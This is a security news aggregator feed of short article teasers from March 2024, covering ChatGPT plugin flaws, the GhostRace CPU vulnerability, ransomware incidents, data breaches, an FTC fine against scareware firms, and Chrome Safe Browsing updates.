Cybersecurity researchers have found that third-party plugins available for OpenAI ChatGPT could act as a new attack surface for threat actors looking to gain unauthorized access to sensitive data. According to new research published by Salt Labs, security flaws found directly in ChatGPT and within the ecosystem could allow attackers to install malicious plugins without users' consent
A group of researchers has discovered a new data leakage attack impacting modern CPU architectures supporting speculative execution. Dubbed GhostRace (CVE-2024-2193), it is a variation of the transient execution CPU vulnerability known as Spectre v1 (CVE-2017-5753). The approach combines speculative execution and race conditions. "All the common synchronization primitives implemented
Two firms have been fined $26 million by the US Federal Trade Commission (FTC) for scaring consumers into believing their computers were infected by malware. Read more in my article on the Hot for Security blog.
Healthcare organizations remain firmly in attackers' crosshairs, representing 20 percent of all victims of ransomware attacks among critical infrastructure entities in the US in 2023.
Source: www.cybertalk.org – Author: slandau EXECUTIVE SUMMARY: As the backbone of modern container orchestration, Kubernetes plays a pivotal role in managing workloads across clusters. However, recent research has shed light on a critical vulnerability that demands attention from security practitioners. In this article, we delve into the specifics of the flaw and provide practical steps […] The post Securing Kubernetes: mitigating the RCE flaw for Windows nodes – Source: www.cybertalk.org was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: securelist.com – Author: Oxana Andreeva, Kaspersky Security Services To help companies with navigating the world of web application vulnerabilities and securing their own web applications, the Open Web Application Security Project (OWASP) online community created the OWASP Top Ten. As we followed their rankings, we noticed that the way we ranked major vulnerabilities was […] The post Top 10 web application vulnerabilities in 2021–2023 – Source: securelist.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.theguardian.com – Author: Presented by Nosheen Iqbal with Alex Hern and Jon DiMaggio; produced by Ned Carter Miles; executive editor Homa Khaleeli A ransomware site on the dark web has allowed criminals to extort hospitals, businesses and schools for years. By encrypting data or threatening to post data online, hackers have cost companies millions […] The post How an infamous ransomware gang found itself hacked – podcast – Source: www.theguardian.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas A new variant of StopCrypt ransomware (aka STOP) was spotted in the wild, employing a multi-stage execution process that involves shellcodes to evade security tools. StopCrypt, also known as STOP Djvu, is the most widely distributed ransomware in existence that you rarely hear about. While you constantly hear how […] The post StopCrypt: Most widely distributed ransomware now evades detection – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas SIM swappers have adapted their attacks to steal a target’s phone number by porting it into a new eSIM card, a digital SIM stored in a rewritable chip present on many recent smartphone models. Embedded Subscriber Identity Modules (eSIMs) are digital cards stored on the chip of the mobile […] The post SIM swappers hijacking phone numbers in eSIM attacks – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Tech support companies Restoro and Reimage will pay $26 million to settle charges that they used scare tactics to trick their customers into paying for unnecessary computer repair services. The U.S. Federal Trade Commission imposed the fine in response to the two Cyprus-based firms’ deceptive marketing, which violates the […] The post Tech support firms Restoro, Reimage fined $26 million for scare tactics – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Google will roll out a Safe Browsing update later this month that will provide real-time malware and phishing protection to all Chrome users, without compromising their browsing privacy. The company launched Safe Browsing in 2005 to defend users against web phishing attacks and has since upgraded it to block […] The post Google Chrome gets real-time phishing protection later this month – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas France Travail, formerly known as Pôle Emploi, is warning that hackers breached its systems and may leak or exploit personal details of an estimated 43 million individuals. France Travail is the French governmental agency responsible for registering unemployed individuals, providing financial aid, and assisting them in finding jobs. Yesterday, […] The post French unemployment agency data breach impacts 43 million people – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas Nissan Oceania is warning of a data breach impacting 100,000 people after suffering a cyberattack in December 2023 that was claimed by the Akira ransomware operation. In early December, the Japanese automaker’s regional division covering distribution, marketing, sales, and services in Australia and New Zealand announced it was investigating a […] The post Nissan confirms ransomware attack exposed data of 100,000 people – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Sergiu Gatlan Microsoft will soon provide a single Teams Windows and macOS app for all account types, allowing users to switch between work, school, or personal profiles with just a couple of mouse clicks. The company says the new unified Teams application will be made available to commercial customers in April […] The post Windows 11 gets single Teams app for work and personal accounts – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Bill Toulas A new wave of attacks by the DarkGate malware operation exploits a now-fixed Windows Defender SmartScreen vulnerability to bypass security checks and automatically install fake software installers. SmartScreen is a Windows security feature that displays a warning when users attempt to run unrecognized or suspicious files downloaded from the […] The post Hackers exploit Windows SmartScreen flaw to drop DarkGate malware – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: www.bleepingcomputer.com – Author: Sergiu Gatlan The U.S. Department of Health and Human Services is investigating whether protected health information was stolen in a ransomware attack that hit UnitedHealthcare Group (UHG) subsidiary Optum, which operates the Change Healthcare platform, in late February. This investigation is coordinated by HHS’ Office for Civil Rights (OCR), which enforces […] The post US govt probes if ransomware gang stole Change Healthcare data – Source: www.bleepingcomputer.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: thehackernews.com – Author: . Mar 15, 2024 Newsroom Data Privacy / Artificial Intelligence Cybersecurity researchers have found that third-party plugins available for OpenAI ChatGPT could act as a new attack surface for threat actors looking to gain unauthorized access to sensitive data. According to new research published by Salt Labs, security flaws found directly in ChatGPT […] The post Third-Party ChatGPT Plugins Could Lead to Account Takeovers – Source: thehackernews.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.
Source: thehackernews.com – Author: . Mar 15, 2024 Newsroom Browser Security / Phishing Attack Google on Thursday announced an enhanced version of Safe Browsing to provide real-time, privacy-preserving URL protection and safeguard users from visiting potentially malicious sites. “The Standard protection mode for Chrome on desktop and iOS will check sites against Google’s server-side list of known […] The post Google Introduces Enhanced Real-Time URL Protection for Chrome Users – Source: thehackernews.com was first published on CISO2CISO.COM & CYBER SECURITY GROUP.